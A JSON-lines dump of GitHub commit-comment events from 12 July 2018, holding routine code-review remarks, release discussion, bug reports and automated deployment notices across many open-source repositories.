{"id":"7958122451","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689656,"position":87,"line":87,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T19:01:44Z","updated_at":"2018-07-12T19:01:44Z","author_association":"NONE","body":"оторвать ненужное"}},"created_at":"2018-07-12T19:01:44Z"}
{"id":"7958123329","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689657,"position":90,"line":90,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T19:01:55Z","updated_at":"2018-07-12T19:01:55Z","author_association":"NONE","body":"переменная не нужна"}},"created_at":"2018-07-12T19:01:55Z"}
{"id":"7958124089","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689659,"position":91,"line":91,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T19:02:05Z","updated_at":"2018-07-12T19:02:05Z","author_association":"NONE","body":"зачем сравнение с true?"}},"created_at":"2018-07-12T19:02:05Z"}
{"id":"7958126327","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689664,"position":122,"line":122,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T19:02:34Z","updated_at":"2018-07-12T19:02:34Z","author_association":"NONE","body":"этот return ничего не делает"}},"created_at":"2018-07-12T19:02:34Z"}
{"id":"7958128028","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689667,"position":125,"line":125,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T19:02:56Z","updated_at":"2018-07-12T19:02:56Z","author_association":"NONE","body":"давай тут сделаем через array.prototype.some"}},"created_at":"2018-07-12T19:02:56Z"}
{"id":"7958128051","type":"CommitCommentEvent","actor":{"login":"dmbates"},"repo":{"name":"JuliaStats/Distributions.jl"},"payload":{"comment":{"id":29689668,"position":null,"line":null,"path":null,"commit_id":"cdb6224bb95a07ab1014acd56f9337036e819c6b","created_at":"2018-07-12T19:02:56Z","updated_at":"2018-07-12T19:02:56Z","author_association":"CONTRIBUTOR","body":"Travis is green after this commit.  Shall we make a new release?"}},"created_at":"2018-07-12T19:02:56Z"}
{"id":"7958129404","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689671,"position":145,"line":145,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T19:03:13Z","updated_at":"2018-07-12T19:03:13Z","author_association":"NONE","body":"не нужен"}},"created_at":"2018-07-12T19:03:13Z"}
{"id":"7958130035","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689675,"position":158,"line":158,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T19:03:21Z","updated_at":"2018-07-12T19:03:21Z","author_association":"NONE","body":"не нужен"}},"created_at":"2018-07-12T19:03:21Z"}
{"id":"7958130449","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689676,"position":167,"line":167,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T19:03:26Z","updated_at":"2018-07-12T19:03:26Z","author_association":"NONE","body":"не нужен"}},"created_at":"2018-07-12T19:03:26Z"}
{"id":"7958132117","type":"CommitCommentEvent","actor":{"login":"yong9900"},"repo":{"name":"ansible/ansible"},"payload":{"comment":{"id":29689684,"position":240,"line":283,"path":"lib/ansible/modules/cloud/amazon/s3_lifecycle.py","commit_id":"6a4f3fb729a00861982a0a7ca041f4160aca2aff","created_at":"2018-07-12T19:03:48Z","updated_at":"2018-07-12T19:03:48Z","author_association":"NONE","body":"this is bad. see problem here: https://github.com/ansible/ansible/issues/42179"}},"created_at":"2018-07-12T19:03:48Z"}
{"id":"7958132238","type":"CommitCommentEvent","actor":{"login":"Dmytriie"},"repo":{"name":"Dmytriie/IMP_CST_Elcav"},"payload":{"comment":{"id":29689689,"position":null,"line":null,"path":null,"commit_id":"c5c4e90b50b28c16bd39920708fa58cc93470783","created_at":"2018-07-12T19:03:50Z","updated_at":"2018-07-12T19:03:50Z","author_association":"OWNER","body":"This program was created to build 2D plots of the R/Q values which were prepared by CST2018\r\nInput - .txt file with strings with one number. Output - 2Dplot\r\nIdea of the input file structure is given by CST modelling. Here - we have loop over all y for each x\r\nIf you have different algorithm in your parameter sweep in CST - you have to rebuild the code according to your logic. "}},"created_at":"2018-07-12T19:03:50Z"}
{"id":"7958132850","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689690,"position":174,"line":174,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T19:03:59Z","updated_at":"2018-07-12T19:03:59Z","author_association":"NONE","body":"давай тут тоже перебирающим методом"}},"created_at":"2018-07-12T19:03:59Z"}
{"id":"7958133574","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689692,"position":184,"line":184,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T19:04:09Z","updated_at":"2018-07-12T19:04:09Z","author_association":"NONE","body":"отступы везде нужно будет поправить"}},"created_at":"2018-07-12T19:04:09Z"}
{"id":"7958134048","type":"CommitCommentEvent","actor":{"login":"andreasnoack"},"repo":{"name":"JuliaStats/Distributions.jl"},"payload":{"comment":{"id":29689694,"position":null,"line":null,"path":null,"commit_id":"cdb6224bb95a07ab1014acd56f9337036e819c6b","created_at":"2018-07-12T19:04:14Z","updated_at":"2018-07-12T19:04:14Z","author_association":"MEMBER","body":"Yes. Let's do it."}},"created_at":"2018-07-12T19:04:14Z"}
{"id":"7958134245","type":"CommitCommentEvent","actor":{"login":"ararslan"},"repo":{"name":"JuliaStats/Distributions.jl"},"payload":{"comment":{"id":29689695,"position":null,"line":null,"path":null,"commit_id":"cdb6224bb95a07ab1014acd56f9337036e819c6b","created_at":"2018-07-12T19:04:17Z","updated_at":"2018-07-12T19:04:17Z","author_association":"MEMBER","body":"That seems like a good idea to me"}},"created_at":"2018-07-12T19:04:17Z"}
{"id":"7958134868","type":"CommitCommentEvent","actor":{"login":"dustyo-O"},"repo":{"name":"Dmitry858/diplom-game"},"payload":{"comment":{"id":29689698,"position":212,"line":212,"path":"game.js","commit_id":"55cc56ea8e71326fcb6c03b09e32989fc9c8fc33","created_at":"2018-07-12T19:04:24Z","updated_at":"2018-07-12T19:04:24Z","author_association":"NONE","body":"почему такая нотация, а не через точку?"}},"created_at":"2018-07-12T19:04:24Z"}
{"id":"7958135216","type":"CommitCommentEvent","actor":{"login":"sweatybridge"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29689699,"position":null,"line":null,"path":null,"commit_id":"07fd7871b38cc8472c3806e254ba4062e3adeae0","created_at":"2018-07-12T19:04:28Z","updated_at":"2018-07-12T19:04:28Z","author_association":"NONE","body":"The `sspi_status` return code set by `InitializeSecurityContext` does not list `SEC_E_UNTRUSTED_ROOT` as one of the possible values in their documentation https://msdn.microsoft.com/en-us/library/windows/desktop/aa375924.aspx. Could you show me the code/documentation you referred to while making this change and explain a bit on how you verified that `SEC_E_UNTRUSTED_ROOT` is indeed returned by `InitializeSecurityContext`?\r\n\r\nThe related issue is #2729 "}},"created_at":"2018-07-12T19:04:28Z"}
{"id":"7958138134","type":"CommitCommentEvent","actor":{"login":"cnmahj"},"repo":{"name":"cnmahj/ev3way-cpp"},"payload":{"comment":{"id":29689703,"position":18,"line":20,"path":"app.cpp","commit_id":"476abb69b34633321510914d47e4c19a2a250ab8","created_at":"2018-07-12T19:05:06Z","updated_at":"2018-07-12T19:05:06Z","author_association":"OWNER","body":"Visual Studio Code のために追加"}},"created_at":"2018-07-12T19:05:06Z"}
{"id":"7958139374","type":"CommitCommentEvent","actor":{"login":"dmbates"},"repo":{"name":"JuliaStats/Distributions.jl"},"payload":{"comment":{"id":29689705,"position":null,"line":null,"path":null,"commit_id":"cdb6224bb95a07ab1014acd56f9337036e819c6b","created_at":"2018-07-12T19:05:21Z","updated_at":"2018-07-12T19:05:21Z","author_association":"CONTRIBUTOR","body":"You should go ahead.  You know more about the release process than I do."}},"created_at":"2018-07-12T19:05:21Z"}
{"id":"7958141069","type":"CommitCommentEvent","actor":{"login":"hawkw"},"repo":{"name":"linkerd/linkerd2-proxy"},"payload":{"comment":{"id":29689710,"position":8,"line":92,"path":"src/config.rs","commit_id":"f61494c87b502244850f038243065d20ed2c6d6a","created_at":"2018-07-12T19:05:42Z","updated_at":"2018-07-12T19:05:42Z","author_association":"MEMBER","body":"In the long term, using a single env var to both enable the thread pool _and_ set the number of threads may not be the Right Thing, if we want to have a default threadpool size and/or default to setting it based on the number of CPUs, etc. \r\n\r\nI wrote it this way as a prototype because it makes the config parsing logic much simpler."}},"created_at":"2018-07-12T19:05:42Z"}
{"id":"7958144245","type":"CommitCommentEvent","actor":{"login":"bradyt"},"repo":{"name":"nex3/dart-mode"},"payload":{"comment":{"id":29689717,"position":27,"line":1781,"path":"dart-mode.el","commit_id":"2759a1723f9fdf46723106e39d1cedb04ecda927","created_at":"2018-07-12T19:06:23Z","updated_at":"2018-07-12T19:06:23Z","author_association":"CONTRIBUTOR","body":"Ah, thank you. If it was some installed package that caused some error, I will keep the hex fix local and/or troubleshoot properly. I removed paren hex codes and pushed."}},"created_at":"2018-07-12T19:06:23Z"}
{"id":"7958146598","type":"CommitCommentEvent","actor":{"login":"esoergel"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":29689723,"position":12,"line":720,"path":"corehq/apps/locations/tests/test_bulk_management.py","commit_id":"8c2d3c168055b30bc73f8f622bbad2ce519be203","created_at":"2018-07-12T19:06:53Z","updated_at":"2018-07-12T19:06:53Z","author_association":"CONTRIBUTOR","body":"Correct, this is most likely only an issue in tests - after actually deleting real domains, stuff may linger in caches for a bit, but it's probably not relevant.\r\n\r\nWe could probably do something like that (that's what I was getting at with my last comment above).  My only worry is that these sorts of calls actually do add a non-trivial overhead to test runtimes.  Maybe flushing the cache all at once is fast enough, not sure.  Profiling tests a while back, I was surprised to see how much of the overall runtime was in cleanups that are always called, but which aren't always necessary."}},"created_at":"2018-07-12T19:06:53Z"}
{"id":"7958146961","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29689724,"position":null,"line":null,"path":null,"commit_id":"2dbdf08fb3d62c916b832bd14f3c4f045dc3833f","created_at":"2018-07-12T19:06:56Z","updated_at":"2018-07-12T19:06:56Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-190655 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-190655\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T19:06:56Z"}
{"id":"7958147510","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29689725,"position":57,"line":323,"path":"code/stable/nopcm/SRS/NoPCM_SRS.tex","commit_id":"00549b29b604b4ebf94456ee1ba9a915fccda49c","created_at":"2018-07-12T19:07:03Z","updated_at":"2018-07-12T19:07:03Z","author_association":"COLLABORATOR","body":"This information has been added back to Note field. https://github.com/JacquesCarette/Drasil/blob/adc6495fb5e7a001c6ee1aa2a05eb9fd6066d850/code/stable/nopcm/Website/NoPCM_SRS.html#L1038-L1043"}},"created_at":"2018-07-12T19:07:03Z"}
{"id":"7958150287","type":"CommitCommentEvent","actor":{"login":"Profpatsch"},"repo":{"name":"purescript/purescript-prelude"},"payload":{"comment":{"id":29689735,"position":null,"line":null,"path":null,"commit_id":"3b0d306c0fa20af4803fdad2313f250d4e388d35","created_at":"2018-07-12T19:07:38Z","updated_at":"2018-07-12T19:07:38Z","author_association":"NONE","body":"According to @MatthiasHu this breaks “referential transparency” for unlawful `Eq` instances: \r\n\r\n```\r\n module Main where\r\n\r\nimport Prelude\r\nimport Effect\r\nimport Effect.Console\r\n\r\ndata MyVal = MyVal\r\n\r\ninstance myValEq :: Eq MyVal where\r\n  eq _ _ = false\r\n\r\nmain :: Effect Unit\r\nmain = log $ show $ vs == vs\r\n  where vs = [ MyVal, MyVal ] \r\n```\r\n\r\nshould be `false`"}},"created_at":"2018-07-12T19:07:38Z"}
{"id":"7958151846","type":"CommitCommentEvent","actor":{"login":"lynxlynxlynx"},"repo":{"name":"gemrb/gemrb"},"payload":{"comment":{"id":29689738,"position":null,"line":null,"path":null,"commit_id":"154cd6ad60a0e26081f04596109cdd0714960c33","created_at":"2018-07-12T19:07:57Z","updated_at":"2018-07-12T19:07:57Z","author_association":"MEMBER","body":"It actually hits syntax errors. My stdint doesn't define uint64_t, so we can't just use either of the two headers. Can we just wing it by using long long wherever you need this?\r\n"}},"created_at":"2018-07-12T19:07:57Z"}
{"id":"7958152176","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29689739,"position":101,"line":340,"path":"code/stable/nopcm/SRS/NoPCM_SRS.tex","commit_id":"00549b29b604b4ebf94456ee1ba9a915fccda49c","created_at":"2018-07-12T19:08:01Z","updated_at":"2018-07-12T19:08:01Z","author_association":"COLLABORATOR","body":"This paragraph has been added back to Note field. https://github.com/JacquesCarette/Drasil/blob/adc6495fb5e7a001c6ee1aa2a05eb9fd6066d850/code/stable/nopcm/Website/NoPCM_SRS.html#L1135-L1140"}},"created_at":"2018-07-12T19:08:01Z"}
{"id":"7958160587","type":"CommitCommentEvent","actor":{"login":"hallyn"},"repo":{"name":"tych0/linux"},"payload":{"comment":{"id":29689755,"position":20,"line":203,"path":"drivers/tty/serial/serial_core.c","commit_id":"866dfb3303c8e707602b16bdbe227983aec12efd","created_at":"2018-07-12T19:09:50Z","updated_at":"2018-07-12T19:09:50Z","author_association":"NONE","body":"Ok but this will still return -ENOMEM in cases where it didn't actually need to alloc a page?"}},"created_at":"2018-07-12T19:09:50Z"}
{"id":"7958164855","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29689764,"position":null,"line":null,"path":null,"commit_id":"493a8e301b9892874eb1fda16a7b7c9a0c967c60","created_at":"2018-07-12T19:10:46Z","updated_at":"2018-07-12T19:10:46Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-media](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-media).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-media-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T19:10:46Z"}
{"id":"7958166776","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29689769,"position":null,"line":null,"path":null,"commit_id":"7126c157e6575fa1c824f0433a7b4e218b421454","created_at":"2018-07-12T19:11:11Z","updated_at":"2018-07-12T19:11:11Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-media](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-media).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-media-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T19:11:11Z"}
{"id":"7958169792","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"mbutterick/brag"},"payload":{"comment":{"id":29689776,"position":null,"line":null,"path":null,"commit_id":"bfacb563df712a83f644352af840114fda185f33","created_at":"2018-07-12T19:11:48Z","updated_at":"2018-07-12T19:11:48Z","author_association":"NONE","body":"<3 Love it!"}},"created_at":"2018-07-12T19:11:48Z"}
{"id":"7958172616","type":"CommitCommentEvent","actor":{"login":"mjames-upc"},"repo":{"name":"Unidata/awips2"},"payload":{"comment":{"id":29689785,"position":null,"line":null,"path":null,"commit_id":"2064bda16e49b30aa64de614d02352d8bec7ffc6","created_at":"2018-07-12T19:12:24Z","updated_at":"2018-07-12T19:12:24Z","author_association":"MEMBER","body":"closes #229, #231, #234, #235"}},"created_at":"2018-07-12T19:12:24Z"}
{"id":"7958175282","type":"CommitCommentEvent","actor":{"login":"DevElias"},"repo":{"name":"DevElias/WebService-Nivel-1"},"payload":{"comment":{"id":29689791,"position":null,"line":null,"path":null,"commit_id":"721f7afa19963ef1cf4e9ccc303ee01d28f8bbfc","created_at":"2018-07-12T19:12:57Z","updated_at":"2018-07-12T19:12:57Z","author_association":"OWNER","body":"Correção na Edição de Usuários"}},"created_at":"2018-07-12T19:12:57Z"}
{"id":"7958175650","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29689792,"position":null,"line":null,"path":null,"commit_id":"226d1cd9258d7386fc7d20dff3a81f21a6526b99","created_at":"2018-07-12T19:13:02Z","updated_at":"2018-07-12T19:13:02Z","author_association":"MEMBER","body":"with kernek 4.1,20 i get many errors warning: ignoring attribute 'noreturn' because it conflicts with attribute 'const' [-Wattributes]\r\n\r\nfound a kernel hack, https://lore.kernel.org/lkml/20180202154813.1625742-1-arnd@arndb.de/T/#u\r\n\r\nor we find a better solution"}},"created_at":"2018-07-12T19:13:02Z"}
{"id":"7958176533","type":"CommitCommentEvent","actor":{"login":"rit-am"},"repo":{"name":"rit-am/garage"},"payload":{"comment":{"id":29689794,"position":null,"line":null,"path":null,"commit_id":"fe5a3fe4f2019d4e9037893277f42e20a9d2aeff","created_at":"2018-07-12T19:13:14Z","updated_at":"2018-07-12T19:13:14Z","author_association":"OWNER","body":"update to user"}},"created_at":"2018-07-12T19:13:14Z"}
{"id":"7958176557","type":"CommitCommentEvent","actor":{"login":"grjones"},"repo":{"name":"rentlytics/django-zerodowntime"},"payload":{"comment":{"id":29689795,"position":5,"line":13,"path":"zerodowntime/management/commands/check_migrations.py","commit_id":"f9768634764bd21f13cde829b0499fbc5d15283a","created_at":"2018-07-12T19:13:14Z","updated_at":"2018-07-12T19:13:14Z","author_association":"NONE","body":"I have this same question.  There's no reference to this in the README"}},"created_at":"2018-07-12T19:13:14Z"}
{"id":"7958178134","type":"CommitCommentEvent","actor":{"login":"lol768"},"repo":{"name":"jkcclemens/paste"},"payload":{"comment":{"id":29689800,"position":null,"line":null,"path":null,"commit_id":"985ed24ceb082b6f57b46f635de4e6886e4727a8","created_at":"2018-07-12T19:13:34Z","updated_at":"2018-07-12T19:13:34Z","author_association":"CONTRIBUTOR","body":"The source maps are in the repo?"}},"created_at":"2018-07-12T19:13:34Z"}
{"id":"7958179497","type":"CommitCommentEvent","actor":{"login":"rishabhdeepsingh"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29689805,"position":null,"line":null,"path":null,"commit_id":"739f03c58d13b43a3d36d01a9ff0bd34f80d15f7","created_at":"2018-07-12T19:13:50Z","updated_at":"2018-07-12T19:13:50Z","author_association":"OWNER","body":"In Java it was more difficult to do that i was facing many problems so i found this solution."}},"created_at":"2018-07-12T19:13:50Z"}
{"id":"7958180507","type":"CommitCommentEvent","actor":{"login":"mwick83"},"repo":{"name":"classycodeoss/esp32-ota-https"},"payload":{"comment":{"id":29689808,"position":18,"line":391,"path":"main/https_client.c","commit_id":"e64183a1bc079aaaaeb20f07ffed06a5df6f5100","created_at":"2018-07-12T19:14:04Z","updated_at":"2018-07-12T19:14:04Z","author_association":"NONE","body":"This change actually leads to heap corruption! '+1' for the trailing \\0 character is missing. When using sprintf below, this will lead to heap corruption."}},"created_at":"2018-07-12T19:14:04Z"}
{"id":"7958180727","type":"CommitCommentEvent","actor":{"login":"PhilippC"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29689810,"position":7,"line":363,"path":"src/keepass2android/Resources/values/strings.xml","commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-12T19:14:08Z","updated_at":"2018-07-12T19:14:08Z","author_association":"OWNER","body":"no, the local backup is something different. A backup copy of the database is stored in the internal memory after successfully opening a database. This backup will never be overwritten (in contrast to the cache, until the database is opened successfully again). "}},"created_at":"2018-07-12T19:14:08Z"}
{"id":"7958181780","type":"CommitCommentEvent","actor":{"login":"Mardak"},"repo":{"name":"mozilla/activity-stream"},"payload":{"comment":{"id":29689812,"position":13,"line":74,"path":"content-src/components/StartupOverlay/_StartupOverlay.scss","commit_id":"bbce85b17bfa82e290bea92e2c13a1ccdc41f623","created_at":"2018-07-12T19:14:21Z","updated_at":"2018-07-12T19:14:21Z","author_association":"MEMBER","body":"This is causing mochitest failures:\r\nTEST-UNEXPECTED-FAIL | toolkit/components/extensions/test/browser/browser_ext_themes_ntp_colors.js | New tab page background should be set. - \"rgb(0, 62, 170)\" == \"rgb(173, 216, 230)\" -\r\n\r\nThe test is making sure the theme's background color is set on `body`, but this selector results in $blue-70 being set."}},"created_at":"2018-07-12T19:14:21Z"}
{"id":"7958183383","type":"CommitCommentEvent","actor":{"login":"rishabhdeepsingh"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29689818,"position":null,"line":null,"path":null,"commit_id":"15b9d011a49a33d367afe37fc1a78f00739742d2","created_at":"2018-07-12T19:14:41Z","updated_at":"2018-07-12T19:14:41Z","author_association":"OWNER","body":"Yes, I will do it."}},"created_at":"2018-07-12T19:14:41Z"}
{"id":"7958186812","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29689827,"position":null,"line":null,"path":null,"commit_id":"d07bfcff2c921e51c0c5347d539c5e1e4919a5dd","created_at":"2018-07-12T19:15:26Z","updated_at":"2018-07-12T19:15:26Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-12T19:15:26Z"}
{"id":"7958187877","type":"CommitCommentEvent","actor":{"login":"tych0"},"repo":{"name":"tych0/linux"},"payload":{"comment":{"id":29689831,"position":20,"line":203,"path":"drivers/tty/serial/serial_core.c","commit_id":"866dfb3303c8e707602b16bdbe227983aec12efd","created_at":"2018-07-12T19:15:39Z","updated_at":"2018-07-12T19:15:39Z","author_association":"OWNER","body":"On Thu, Jul 12, 2018 at 07:11:11PM +0000, Serge Hallyn wrote:\n> Ok but this will still return -ENOMEM in cases where it didn't actually need to alloc a page?\n\nYes, but let's walk before we can run :)\n"}},"created_at":"2018-07-12T19:15:39Z"}
{"id":"7958188371","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29689832,"position":null,"line":null,"path":null,"commit_id":"9764b46e11d69267831494fab1717e44f055c359","created_at":"2018-07-12T19:15:47Z","updated_at":"2018-07-12T19:15:47Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-191546 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-191546\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T19:15:47Z"}
{"id":"7958191236","type":"CommitCommentEvent","actor":{"login":"kashike"},"repo":{"name":"jkcclemens/paste"},"payload":{"comment":{"id":29689838,"position":5,"line":9,"path":"webserver/Cargo.toml","commit_id":"985ed24ceb082b6f57b46f635de4e6886e4727a8","created_at":"2018-07-12T19:16:23Z","updated_at":"2018-07-12T19:16:23Z","author_association":"CONTRIBUTOR","body":"Okay, I'll no longer ask you nicely."}},"created_at":"2018-07-12T19:16:23Z"}
{"id":"7958197809","type":"CommitCommentEvent","actor":{"login":"ararslan"},"repo":{"name":"JuliaStats/Distributions.jl"},"payload":{"comment":{"id":29689848,"position":null,"line":null,"path":null,"commit_id":"cdb6224bb95a07ab1014acd56f9337036e819c6b","created_at":"2018-07-12T19:17:50Z","updated_at":"2018-07-12T19:17:50Z","author_association":"MEMBER","body":"I can tag a release if Andreas hasn't already beaten me to it. Though with Attobot, package releases are quite simple. Basically\r\n\r\n1. Click on Releases in the GitHub UI to see all releases\r\n2. Find the link to the commits on master since the last release\r\n3. Look through them. If it's just fixing stuff and there's nothing new, a patch release (i.e. the z in x.y.z) will do, otherwise a minor release is better (the y in x.y.z).\r\n4. Use the GitHub UI to create the new version from master\r\n\r\nThen Attobot takes care of the PR to METADATA and all that."}},"created_at":"2018-07-12T19:17:50Z"}
{"id":"7958198409","type":"CommitCommentEvent","actor":{"login":"hermanventer"},"repo":{"name":"facebook/prepack"},"payload":{"comment":{"id":29689850,"position":8,"line":169,"path":"src/evaluators/ForStatement.js","commit_id":"53eeb99661d3aa3e096cb07f390560e3b69776c7","created_at":"2018-07-12T19:17:58Z","updated_at":"2018-07-12T19:17:58Z","author_association":"CONTRIBUTOR","body":"computationally"}},"created_at":"2018-07-12T19:17:58Z"}
{"id":"7958205492","type":"CommitCommentEvent","actor":{"login":"tabish121"},"repo":{"name":"gemmellr/qpid-proton-j"},"payload":{"comment":{"id":29689863,"position":122,"line":802,"path":"proton-j/src/main/java/org/apache/qpid/proton/codec/CompositeReadableBuffer.java","commit_id":"44bfb4013138d69062b2f4fb07cd4aa8225d5204","created_at":"2018-07-12T19:19:28Z","updated_at":"2018-07-12T19:19:28Z","author_association":"NONE","body":"Same as above, we are leaving the source with references to data we read / copied which could leave pooled data in an unusable state if the caller isn't doing their own reclaiming.  "}},"created_at":"2018-07-12T19:19:28Z"}
{"id":"7958205736","type":"CommitCommentEvent","actor":{"login":"tabish121"},"repo":{"name":"gemmellr/qpid-proton-j"},"payload":{"comment":{"id":29689864,"position":72,"line":752,"path":"proton-j/src/main/java/org/apache/qpid/proton/codec/CompositeReadableBuffer.java","commit_id":"44bfb4013138d69062b2f4fb07cd4aa8225d5204","created_at":"2018-07-12T19:19:32Z","updated_at":"2018-07-12T19:19:32Z","author_association":"NONE","body":"My expectations with this would be that in most cases the caller would be expecting no to use the source buffer again or to start appending to it as a new buffer.  I can see that we could leave it to the caller to call reclaimRead but I'd guess that'd end up being forgotten in most cases.  Would it make sense to always reclaim what we took from the source ?"}},"created_at":"2018-07-12T19:19:32Z"}
{"id":"7958212848","type":"CommitCommentEvent","actor":{"login":"PhilippC"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29689880,"position":null,"line":null,"path":null,"commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-12T19:21:01Z","updated_at":"2018-07-12T19:21:01Z","author_association":"OWNER","body":"thanks for your work. I obviously missed quite a few places."}},"created_at":"2018-07-12T19:21:01Z"}
{"id":"7958217397","type":"CommitCommentEvent","actor":{"login":"gausscurve"},"repo":{"name":"gausscurve/rtfm"},"payload":{"comment":{"id":29689895,"position":null,"line":null,"path":null,"commit_id":"595fc4239408cce97e49a811bef91579b1c73b05","created_at":"2018-07-12T19:22:00Z","updated_at":"2018-07-12T19:22:00Z","author_association":"OWNER","body":"I'm sorry for the suffering of all of you.\r\nI will be happy to get in touch in the future. \r\nPlease committ."}},"created_at":"2018-07-12T19:22:00Z"}
